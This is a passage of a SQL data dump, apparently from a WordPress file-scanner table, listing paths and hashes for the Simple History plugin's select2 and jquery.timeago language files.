,'?'),(0x8D07995F1A856D293A90423EB7F04F7A,'wp-content/plugins/simple-history/js/select2/i18n/fa.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/fa.js',1,0x00000000000000000000000000000000,0x34664C7F3FF42C8E04DCEB13B046B365,0x24F544C905A56A47EB0FA10724CCB833849EBD8147A8435DEBB3697DA195DE35,'',0,'?'),(0xBB4F5214F2B934CFE4B2FE0B4CDAC5D5,'wp-content/plugins/simple-history/js/select2/i18n/fi.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/fi.js',1,0x00000000000000000000000000000000,0xD3D0E8F83E3887C25701C6E4FA2FE334,0xEA43A1161B49099F49D252EF9889E3AD454E069485E0BE0A0EA9360D9D21F0FD,'',0,'?'),(0xC8716D9CDE0DE5D542E0361D658E0C0C,'wp-content/plugins/simple-history/js/select2/i18n/fr.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/fr.js',1,0x00000000000000000000000000000000,0x513900413EC7351025EB0B6CA879D41B,0x4B0E96462C09C32A1AD1DABF3DAA549E88492D1B2933463D5D1DDB0A92B2FF8F,'',0,'?'),(0x8018AF24B5ABCF42ED9486B30F3FA246,'wp-content/plugins/simple-history/js/select2/i18n/gl.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/gl.js',1,0x00000000000000000000000000000000,0x235993B6DD1761E5637974759F5EDA7A,0xF4B26517AED53F0666FEA628612C2EB92740813501CCCA14CAE5817A737C3D19,'',0,'?'),(0x180FF15151C8B452A0B3C44BEB8449FF,'wp-content/plugins/simple-history/js/select2/i18n/he.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/he.js',1,0x00000000000000000000000000000000,0x16849BC86CFD816A71C9AFFA0AD94156,0x295EEBCFBDA4C9A1D594944FA0A4DC15576894FA9BA0FC785255C23E2EA261E6,'',0,'?'),(0xEFF53B0B7DDCEFA0D582D415C283D00B,'wp-content/plugins/simple-history/js/select2/i18n/hi.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hi.js',1,0x00000000000000000000000000000000,0x7C367DCE88125572370C7253DA2764E9,0x5470002074E5FC53DC60AD79179F4C9F11AA80C6071C7FB4BA50B857DE9A5397,'',0,'?'),(0x8E13E318EC387BAF73442C119864B556,'wp-content/plugins/simple-history/js/select2/i18n/hr.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hr.js',1,0x00000000000000000000000000000000,0x58298A99909EEE026AE4E5600FFF8DEA,0xE9EBB97AF68A072DF9BF0882DDD2674347B060C667654411D52E1140F08CBF7A,'',0,'?'),(0xD7DFF7D123F45DD915EBD76162108E99,'wp-content/plugins/simple-history/js/select2/i18n/hsb.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hsb.js',1,0x00000000000000000000000000000000,0x213D5D63719B1B0D0652E736436259B5,0xB4E75E841CF928D19BBB0D8C30D98F6011EFF5CD8C1E5C9C459BFE50A5311CCD,'',0,'?'),(0x9C173F7A0D11711DB5022999A2EB011D,'wp-content/plugins/simple-history/js/select2/i18n/hu.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hu.js',1,0x00000000000000000000000000000000,0x8E0A7882CAF41769C71CF8B55E84921A,0x8648E6740CE5CD52E5CDCEDC5B1348CDA16733E081BB40DC962B946D13AA030C,'',0,'?'),(0x0A908D91BF14BB05973390F7B2C77343,'wp-content/plugins/simple-history/js/select2/i18n/hy.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hy.js',1,0x00000000000000000000000000000000,0x299347CB3955FBC307794321436EEECE,0x014652FEFD2969E7002B61497048817E9ACE15442127B7FD280091C7B73FDD3A,'',0,'?'),(0x87B91E9C655498AC8BD75F4718415FD7,'wp-content/plugins/simple-history/js/select2/i18n/id.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/id.js',1,0x00000000000000000000000000000000,0xD362E1FDF9136F4A30F51012B7B8D4A2,0x56E475E659B999C69CEE84E3D2BD43B8D986209B31E745E7FCE94BF8CCE3B9C9,'',0,'?'),(0x3AE577CC48E30372B9FA09323478AFA3,'wp-content/plugins/simple-history/js/select2/i18n/is.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/is.js',1,0x00000000000000000000000000000000,0xB74AD80E6C02BDD177DCBBDAB756B16C,0x3F04C7A62C8C93ABDF305C46010F7AF65A9D6D257D5B26F4B17B027EF98DEE33,'',0,'?'),(0x4311313E5A16699E70C5A3A35BF793C6,'wp-content/plugins/simple-history/js/select2/i18n/it.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/it.js',1,0x00000000000000000000000000000000,0x9FA7B64A951A97007D9C097A266EB3FC,0x10E8024C3BC8BF5CF7A5C6471E124270467EE9DE223AFFEB2A084A76265EF908,'',0,'?'),(0x616B04B3955823284FEFD8B8B2BDCB76,'wp-content/plugins/simple-history/js/select2/i18n/ja.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ja.js',1,0x00000000000000000000000000000000,0xA513741667EEDE9486BC13349B2622D2,0x0BE7F49100CEB71DDFF3400075764A128B2A3A9D9812ED8B901233F6B72D5C78,'',0,'?'),(0x7686D465C0FEB5FEE9A59933A2420297,'wp-content/plugins/simple-history/js/select2/i18n/km.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/km.js',1,0x00000000000000000000000000000000,0xC9BFA4DC94E6B241DEECEEA9CD33A21D,0x756EE1FD1723390820C2A3EE59F7F798CEAB368260AE399D2CB05B2046BBAE9D,'',0,'?'),(0xC0E1BE254657C7B74D0B12E4386CAFD5,'wp-content/plugins/simple-history/js/select2/i18n/ko.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ko.js',1,0x00000000000000000000000000000000,0x2DB7FD9AB54E75D8D4DED6ABCBDB9C6C,0x73A6C15D8B0ABBCC0C4057EA7605821386ECE0DB5185DAFC235750ADFAE2B9AD,'',0,'?'),(0x9ABCF5CE0B7C9FBC0B3DD77CE4839410,'wp-content/plugins/simple-history/js/select2/i18n/lt.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/lt.js',1,0x00000000000000000000000000000000,0x0449EAA75EFC4A6A8DF49F0D09566D71,0x1059584504E7EA65E87276287DC1FD6A7033AA64BEE6F25EC2CCD8233D0B2214,'',0,'?'),(0xC6FFD812D2F21F86513163525EE9AAE6,'wp-content/plugins/simple-history/js/select2/i18n/lv.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/lv.js',1,0x00000000000000000000000000000000,0xB9B5F137EA0AEA4E8EFA22F4C533DCE7,0x4D74EEB2B214C652A7D85797B49539945C17DD7CFE7312559D1B558EE91A5323,'',0,'?'),(0x6035359F204258AA169399CD861C258E,'wp-content/plugins/simple-history/js/select2/i18n/mk.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/mk.js',1,0x00000000000000000000000000000000,0x6D008EFDA78753F02D495EC6085B36A3,0xF09E176B33529B83414832029330AB7F146B34BD445239AFFB7800F9E015A6E2,'',0,'?'),(0xC6B9565DED501AD9DCE9F779246A33DA,'wp-content/plugins/simple-history/js/select2/i18n/ms.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ms.js',1,0x00000000000000000000000000000000,0x048CA2058665AA5B1925E4D571E56534,0xB2971A2CCF2A676CA8AAF1F056F6905B95C8EA7ABD440C08B67B8A91FA1B6DDD,'',0,'?'),(0x80E1376B08E27A7D82A8C5C9A50AC4D5,'wp-content/plugins/simple-history/js/select2/i18n/nb.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/nb.js',1,0x00000000000000000000000000000000,0x780C7D4CA5E5B34F0DAF91BB1DDC65A4,0x8ECFD7C68D792D8E723F3D142BAE9685C457CA2F1902959837299115BD4CC7BB,'',0,'?'),(0x94E63F7CF1383E65A4E0A6F01E71EC1F,'wp-content/plugins/simple-history/js/select2/i18n/nl.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/nl.js',1,0x00000000000000000000000000000000,0x915F5E0CB81407C432FE94BBCA1CAE85,0xA5553CF6ABFCA75C2DED0F25B8D810CA7EC8D4F95C06AAD374AE408109A13267,'',0,'?'),(0x5A99BD278EB5AAC9C933A5082C0AD7DF,'wp-content/plugins/simple-history/js/select2/i18n/pl.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/pl.js',1,0x00000000000000000000000000000000,0xF2749B2C4A575F4611554725FDC369D0,0x4E885814046B7C5E16CBF34E8D1603D6707D50CB2E504CE6533D7DEE48ABE491,'',0,'?'),(0x55AE4E60AEC7814110C382A2FDD31D80,'wp-content/plugins/simple-history/js/select2/i18n/ps.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ps.js',1,0x00000000000000000000000000000000,0xFAA2A36C152EADE110F7844B6C328406,0x84E48673B661B56BA35A725E74FA551F0278D4F972A284801EA897700F4B9C9B,'',0,'?'),(0x5B6216C55E6D0F48D6DFC706A58ED83C,'wp-content/plugins/simple-history/js/select2/i18n/pt-BR.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/pt-BR.js',1,0x00000000000000000000000000000000,0xB80E354C3598AA02460EEE6D83B459BD,0x8743751EA1BB4BDD8B00A54DBA6218931E010512CC97F4C5AD4343105708144C,'',0,'?'),(0xE8AC277FC971E377041E8D46F8227978,'wp-content/plugins/simple-history/js/select2/i18n/pt.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/pt.js',1,0x00000000000000000000000000000000,0xCA0B66ADA7E5013B931D8C91289F2C28,0xE5C09C3BBE6AFEDB4E438E3B9502032BD5CDB95FCD4F0D8D4CB84B23D4407164,'',0,'?'),(0x4EC17B3CD9C7043D244527E206E96E52,'wp-content/plugins/simple-history/js/select2/i18n/ro.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ro.js',1,0x00000000000000000000000000000000,0x27BAF44DFBF15CF2FEE1CCDDAAB58F00,0xA6569306FCE7443322C74E0F6392C1DAF8BEEDD058E9BCFC387E461CE9728D59,'',0,'?'),(0xFD32636B0CAA2896DB25E5D9961998DF,'wp-content/plugins/simple-history/js/select2/i18n/ru.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ru.js',1,0x00000000000000000000000000000000,0x333DC144A29181CE03D86D04629FCEBA,0x73792334E2B920717605C049CB56C464ADFE3FEA203CE8E78C5A8928F6B4D0D2,'',0,'?'),(0x35C11172CDB84EDFE392A6E97678015F,'wp-content/plugins/simple-history/js/select2/i18n/sk.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sk.js',1,0x00000000000000000000000000000000,0x4F8E125ED3510CBA3BA70C67C0904A64,0x495B2C7C75BC4C3D039940882054E9303BC4CFD1D373D6F461C55E7F8C4550B6,'',0,'?'),(0x5155943E378E46AEC1E2068039E75ABC,'wp-content/plugins/simple-history/js/select2/i18n/sl.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sl.js',1,0x00000000000000000000000000000000,0xF9A6A8C80EFE20B507DC95F83D086FD8,0x1A2D6509D52F36F324961F63A3F25D061345E66AB4357E1F7D9653B734AD9D25,'',0,'?'),(0x854BC36ECD4650F6CBD8A0EF42F0692B,'wp-content/plugins/simple-history/js/select2/i18n/sr-Cyrl.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sr-Cyrl.js',1,0x00000000000000000000000000000000,0x38E1DCD92B49B6B15DB670B0A17B6EE7,0x531A2320F06FFD9CB827931178AFDFD7656DDD22B27759618F06EA100EDE6FEC,'',0,'?'),(0xCC0E275794F40F8AAB59754C0806AEC6,'wp-content/plugins/simple-history/js/select2/i18n/sr.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sr.js',1,0x00000000000000000000000000000000,0xBEA46AB6F8CECEE10A5ED9117132340E,0x7D39B985EDCED0D9D632C17959E16DCE965CD2BAA697CDD30676651FA07A7964,'',0,'?'),(0x2802F7B997E57F16F8F6D24B85263B0F,'wp-content/plugins/simple-history/js/select2/i18n/sv.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sv.js',1,0x00000000000000000000000000000000,0x87B4585BD3C7EF517B7609C3A75A1174,0xCB77BBF097F5A402BF38FB4367BE628E654D8563D537A6D07AB92FA75A596889,'',0,'?'),(0xA7C95FA5851C8DE3F83D3620D153E764,'wp-content/plugins/simple-history/js/select2/i18n/th.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/th.js',1,0x00000000000000000000000000000000,0xF9174E84A42F5EA14ECFDBDF7CCC27BB,0xDEECA1FA8026ABEAFF8D53455ED074F5707F1ED8876BACA9830C7C7B2F02EC86,'',0,'?'),(0xD25E5359C423BA2FBDE5ED93B02A31FB,'wp-content/plugins/simple-history/js/select2/i18n/tr.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/tr.js',1,0x00000000000000000000000000000000,0x58A4E9829081626B1AAAD3D46CCBDDDF,0xFA8FE110E026347F63A54CBF9D8903DA4072C11FF9B5A1B21CFBCDDEF32C8256,'',0,'?'),(0x61DDB69DBF90738471C4D9BDFF1D94DE,'wp-content/plugins/simple-history/js/select2/i18n/uk.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/uk.js',1,0x00000000000000000000000000000000,0x2B952E4205B7E4285DFADA3BC018906A,0x8AE9DBBA08CF0A154DF2A482C5F2453A56B7D0EB95C9B91FFDD665F766A87B57,'',0,'?'),(0x29007A1CCED0C820E4A5236405CCC3AB,'wp-content/plugins/simple-history/js/select2/i18n/vi.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/vi.js',1,0x00000000000000000000000000000000,0x91F875052AC9C9C97850C3528C61EC3E,0x9BF609AABB58C1E7F7EF5998E33E12F208420E69D3063E112BACB9A60DE2C1DF,'',0,'?'),(0x12760F4607301B63781915DA39A21829,'wp-content/plugins/simple-history/js/select2/i18n/zh-CN.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/zh-CN.js',1,0x00000000000000000000000000000000,0x569BAF3C0A1E92D2C2707D3231692E15,0x4733F314599D9DAC7C36876A9E21CAAD6DCE775716FEE681D951492704310BCE,'',0,'?'),(0x559AEE24D0A0202A6F2876465D870F37,'wp-content/plugins/simple-history/js/select2/i18n/zh-TW.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/zh-TW.js',1,0x00000000000000000000000000000000,0x261326600CE25581979B60E26A51CF21,0x455BA2070874490AC400D90222993C8302C1E646C9165A5FF70FBABC3D847EBC,'',0,'?'),(0x24BFAC4703E090752F8E956B80F55CF4,'wp-content/plugins/simple-history/js/select2/select2.full.min.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/select2.full.min.js',1,0x00000000000000000000000000000000,0xCD78B47F8F1999FB4D258515099231D0,0xB654B96852B8686FBC948A6D7816256C33FAC85C397FBAC6F72EB8994837E544,'',0,'?'),(0x07BECFEAFF75FA5CCA25765352D8526F,'wp-content/plugins/simple-history/js/select2/select2.min.css','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/select2.min.css',1,0x00000000000000000000000000000000,0xD44571114A90B9226CD654D3C7D9442C,0x0EDE564235B8EFD4D184C88894AF50A1D89F61EB6E6867FBBEBE21C59E060D54,'',0,'?'),(0x9226E3455F7F77A2F8E44C06BB395662,'wp-content/plugins/simple-history/js/select2/select2.min.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/select2.min.js',1,0x00000000000000000000000000000000,0x26ABB17F4B7260EA8C912313E2C80FEF,0x1280D2B078F51F74183B34CE2680AD360396D618F8B91B44221F94F454D9FF01,'',0,'?'),(0xE4C0AC82A655BC8FF7E03A9A96C67CF0,'wp-content/plugins/simple-history/js/timeago/jquery.timeago.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/jquery.timeago.js',1,0x00000000000000000000000000000000,0xA0EF2BA6BE8DC548B2C4A47313FECC08,0x433F4DAE5CB782BF3EB42F09B90FBD6B6C74B7F5278ED12E514A7877C818A22F,'',0,'?'),(0x2429663845604B35F17EEDAB8ED5A729,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.af.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.af.js',1,0x00000000000000000000000000000000,0x1201DA51FA7FE4ACF7AEAF7ACCB8C19E,0x6A55AA6D0357B8C407C83EA8488CB56735414AD86C013152B4440F2A41F537BF,'',0,'?'),(0x079F1D2EF151E17C69C930040F8266E1,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.am.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.am.js',1,0x00000000000000000000000000000000,0x32051CF40888B6A01350E63E7F7CA7F6,0x6359B094803381CA91EAAA0041086373548D165D8B7C3808113597848CA6B4E2,'',0,'?'),(0xB4C15099D13E5E50ED1F748980BD8CF0,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ar.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ar.js',1,0x00000000000000000000000000000000,0x5B965D820BC01C7332B25A0C6283B4AB,0x61581A023C02705D25A27607AE9A5BFEE7B5BCD6AF598E07EBAF66F6F06FF38F,'',0,'?'),(0xB03DF94D825B6E2B049E10834557A732,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az-short.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az-short.js',1,0x00000000000000000000000000000000,0x3393FDEB4DCD73D854D53AC6D0E9853B,0x05133FD355FCD762C9E24ACFC2AA591367FE9A48F6C054308D0DE2AB30C50EBD,'',0,'?'),(0xB1341BDF750E9FEB0981413AFA757952,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az.js',1,0x00000000000000000000000000000000,0x757C49025E0E2E2213438D6762D92186,0x2FA899C8B373F5656A8214CBD4941756498A96E1C379AA6E0F2FA7FDD75453AA,'',0,'?'),(0xF7A2466B4CB94E97B95C83FA55C61703,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.be.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.be.js',1,0x00000000000000000000000000000000,0xD279F4B2202466161A65E66E98EBA305,0xF777F9CE87F532BF7EE94B2D2EA2813C9B99269DAE3FEC6103DED2B932E0276B,'',0,'?'),(0xDA0F5DFB1DF341893FD029FBA21F7997,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bg.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bg.js',1,0x00000000000000000000000000000000,0x70111E558BB24BB89039CE137B0C4D68,0x8808FBD3B8436A998D684794F6240C84E51F837FC72B1A7ED721D2F6D769B098,'',0,'?'),(0xA6604ED4CB24B5BADA2CB7C95A5DF293,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bs.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bs.js',1,0x00000000000000000000000000000000,0x7506CF3D37D06061FEAAF8FC99E1A3B1,0x4C1BB75D837665E54807C3CC2ED088EB8639F8CF01B17B35E0130628C98EEC0C,'',0,'?'),(0x4B4648FBF97DDE9EBBDE7F7A1D762A6D,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ca.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ca.js',1,0x00000000000000000000000000000000,0x9D068432F0076A3886FD493EA482543D,0x68D6494F77A6438BA9373CE69164717B3CAC24F327897C6CB47E7F8CFC8C6A1B,'',0,'?'),(0xBC38779C8CBE07199D6264C9B2C7934A,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cs.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cs.js',1,0x00000000000000000000000000000000,0xAFEA6AD68152FF20BA06B33A500B4CC5,0x7FAE4424823EBEE8C257CAE12BAE781711C2479F9CBAA6B3EBB2E8DC03D6CC33,'',0,'?'),(0x61C40D86AC980E8B0023E9C9B5CAF7FF,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cy.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cy.js',1,0x00000000000000000000000000000000,0xA16C84A5788B1B3AB776A78D5AC9260C,0x1E547C9EE57D6610E88EF3E7F8CBCB998AA9C488022F456B05B138F85F8548E2,'',0,'?'),(0x89B3841AA790A739B4CF0C3FCA52E746,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.da.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.da.js',1,0x00000000000000000000000000000000,0xDCB9F349B7C6833A98AA0FB2B1B99B1E,0x06443D2BB342F0917D7BE06A9D471BD0E19B43FCAF33C3C5A9AB5A07111DCF90,'',0,'?'),(0x3094709D5D9A394E28954DE9C81963EA,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de-short.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de-short.js',1,0x00000000000000000000000000000000,0x8C901BE8A9FF23C280AD78FF03F703A7,0x83E9C26996D3B39422EE2B3060C649ECAD54A7348C87D7F05E8828F6063A6763,'',0,'?'),(0x5337E44BB6A3FE5776AD9AD1909E2903,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de.js',1,0x00000000000000000000000000000000,0x416A5AA4CAC41E72766A0041D9258004,0x5B85962F0BB75360AF982F26A5D6E2FB6DEEFED57CAB5FDE4D1A4C72E862302C,'',0,'?'),(0x4FECE1BB3CC8265086C690B9DEDE8C6B,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.dv.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.dv.js',1,0x00000000000000000000000000000000,0xB73DCC244FDAF889739A23B38ADFE140,0x6287E545FA9334F5EEAB250B5B9B892C38BB30D3DBE8CC16CDD0A1CF8592B4B3,'',0,'?'),(0xF51AF4B0CDFBD045BF5A712DA032CCBC,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.el.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.el.js',1,0x00000000000000000000000000000000,0x0BB3A50EF9DE55EE6F806915AEC4CCD2,0x77F14A2D88DB1244BA98C9AB3FEC96BF5BDF0CB5ABBDDD86C2068FBC118429C1,'',0,'?'),(0x3A215B975BB7833052B641C13DAE21FD,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en-short.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en-short.js',1,0x00000000000000000000000000000000,0x4571C0D01EFA6C8A9DE9730528793B04,0x46BF21F2AE633B0568E47CC9E3129C8B1B8A404B7BFD49306B770BDAD03292F2,'',0,'?'),(0xFF153DD17BABCD8C5E2AA7D7F1B34936,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en.js',1,0x00000000000000000000000000000000,0x3E8E7D15D33959F060A7C127BB01CB82,0xD4047C3B7E595BEBFFF9D485644E795656F63E15F05987E2C156788E41F59B7B,'',0,'?'),(0xE8A45CACC81036424E8B335633282D18,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es-short.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es-short.js',1,0x00000000000000000000000000000000,0x0E380BF5F339D4DA1583AF1ABA7DFFF1,0x00AC94755BBD7EC04A9AE4F3A97F6DB29EB91C7CE6991388552322FB53A8FBD3,'',0,'?'),(0xA6786B3FCFFBE8EF9B143206C413A646,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es.js',1,0x00000000000000000000000000000000,0xEB3F3097B1F1E05F90653ED5DCD6C734,0xEF801748D75AF2150B019136D54E802544549DBA217E832A5EC972B96942FFCD,'',0,'?'),(0x10C44BA05481753BE80E0606EEC4FDA1,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.et.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.et.js',1,0x00000000000000000000000000000000,0x2753F73CF77E7DE47E57D7698BB444DA,0x67A7418907C6DC0BC26B5F6F8AF09A940BEBD11FF2501A814BDFB955F62DCD10,'',0,'?'),(0xFC2BA96D27B18C205632D8B5CB8FF81C,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.eu.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.eu.js',1,0x00000000000000000000000000000000,0x4CDB0B098E0C103335D90054E9F226FC,0xB65284DAC2F64F7373149BA39B485375B6D15F7CFDE4D8B1EA098325EA027548,'',0,'?'),(0xBDFA3C5C6FBDFC81F76877C5BEB0FA10,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa-short.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa-short.js',1,0x00000000000000000000000000000000,0xC77247562FE9E93503A3270C76F34DCE,0x2C59780AB72140D5D1ED6F34E7CB8632BA49B69505B4C6A79F2FEEF93EB902B3,'',0,'?'),(0x65498B6B4054F59ADDE66EC7DD8FBBD3,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa.js',1,0x00000000000000000000000000000000,0x5F4EBDEE482F42FA13B52BD01090F4B8,0xE7056CDE31ADDCC85A6BBBCE577C57B22292EDA52EA2F8FB510035BD502239B1,'',0,'?'),(0x0ACCB6AAA87051AB3D1EDB90F0B1FF5E,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fi.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fi.js',1,0x00000000000000000000000000000000,0x3D886B44722E2D84C398A14854130AFD,0x93AFA32DCA4DC4503801DB1D62A2923402B685E33E2D3CD7C9D5A9256818E3E6,'',0,'?'),(0xC01CB7447BC07EB00C776485E5AB6EB8,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr-short.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr-short.js',1,0x00000000000000000000000000000000,0x64578342FD496977C9E87B020207B838,0xF58DF7A489F3DED7A62B84C680742D06C8E866965486A8EC5B22F6F56ED78FCC,'',0,'?'),(0x4BD26873FB6FFE28D298470D6FEC677B,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr.js',1,0x00000000000000000000000000000000,0xC4ED9A6A4D78BCC75DF92C32149C3837,0x27DFB9ADD1F907798CFDD78EB25D8DE6FB165D94EBFAC4AA544C7197BF4F3213,'',0,'?'),(0x1D2A1427C38911DD07C352E490FA21EF,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.gl.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.gl.js',1,0x00000000000000000000000000000000,0x8D79EA8C0123D8F962CA561F70FB8157,0xFC16BC8D72E9CF89601FB6E9824E56FB5C3481D011B65173DE2B08AE6ECC890A,'',0,'?'),(0x3A6C99ED0832882BC8F388C9CF76812D,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.he.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.he.js',1,0x00000000000000000000000000000000,0xD1CC692C963231E9E39F1A940DD81933,0x49C79321AB4B35FBA1B35E2A2FB0D0D30519ACD097980F2C97AA6C4548E6DC8E,'',0,'?'),(0x622D0967CBFA8F64E03621006E7F8753,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hr.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hr.js',1,0x00000000000000000000000000000000,0xABD4E606F4AA1873BADAD782B04120E4,0x04E6B464A31B3E6DA0A48B73000C139DBB26AD4EB639EAE599C9AA8031246601,'',0,'?'),(0x313D074EF8A5B40D8313CEDDA0BD4C9B,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hu.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hu.js',1,0x00000000000000000000000000000000,0xA04DB3241EA3F5D4110BCB9EED140BFC,0xC63A3D7CEAC6F40C47F7F0D9A5AE41F4C006BAAEC918CC470DEDFF6E668B12B7,'',0,'?'),(0x7C1144D71AEF1FFBEAADD0D5340AA8E5,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hy.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hy.js',1,0x00000000000000000000000000000000,0xDB4D50A0C3A822D1DD5251159496B5B2,0x206C1B1FB296C3B99E872044AC6D67E866697238EF00461856168C138B258E2E,'',0,'?'),(0xE666E2077811F92ACFD0439F00256AFF,'wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.id.js','/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeag